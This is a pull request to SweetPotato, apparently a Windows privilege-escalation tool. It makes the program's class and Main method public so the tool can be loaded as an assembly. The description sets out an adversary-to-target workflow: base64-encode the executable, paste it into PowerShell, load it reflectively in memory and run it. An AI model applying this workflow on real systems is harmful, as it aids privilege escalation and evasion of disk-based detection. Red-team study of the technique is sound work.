### PR TITLE
making class and main function as public

### DIFF
--- a/Program.cs
+++ b/Program.cs
@@ -7,13 +7,13 @@ using System.Threading;
 using static SweetPotato.ImpersonationToken;
 
 namespace SweetPotato {
-    class Program {
+    public class Program {
 
         static void PrintHelp(OptionSet options) {                
             options.WriteOptionDescriptions(Console.Out);
         }
 
-        static void Main(string[] args) {
+        public static void Main(string[] args) {
 
             string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
             ushort port = 6666;
@@ -141,3 +141,4 @@ namespace SweetPotato {
         }
     }
 }
+

--- a/SweetPotato.csproj
+++ b/SweetPotato.csproj
@@ -104,6 +104,9 @@
     </BootstrapperPackage>
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <PropertyGroup>
+	<DependenciesAssembly></DependenciesAssembly>
+  </PropertyGroup>
   <Import Project="packages\dnMerge.0.5.13\build\dnMerge.targets" Condition="Exists('packages\dnMerge.0.5.13\build\dnMerge.targets')" />
   <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
     <PropertyGroup>
@@ -111,4 +114,5 @@
     </PropertyGroup>
     <Error Condition="!Exists('packages\dnMerge.0.5.13\build\dnMerge.targets')" Text="$([System.String]::Format('$(ErrorText)', 'packages\dnMerge.0.5.13\build\dnMerge.targets'))" />
   </Target>
+
 </Project>


### PR DESCRIPTION
Made the `Program` class and `Main` function as `public` to allow the tool be loaded as assembly.

## Workflow

### Adversary machine

1. Make changes to the affected lines, recompile the tool
2. Package the .exe into a .zip using
3. Base64 encode the .zip file

```
[Convert]::ToBase64String([IO.File]::ReadAllBytes("SweetPotato\bin\Debug\SweetPotato.exe")) | Out-File -Encoding ASCII SweetPotato\bin\Debug\SweetPotato.txt
```

### Target machine
1. copy the base64 encoded string via clipboard and paste into powershell

```
$infile = "[BASE64 BLOB]"
```

2. Reverse the base64 encoding and unpack the .zip file with the following command

```
$SweetPotatoAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($infile))
```


3. Confirm the successful load

```
[SweetPotato.Program]::Main("".split())
```
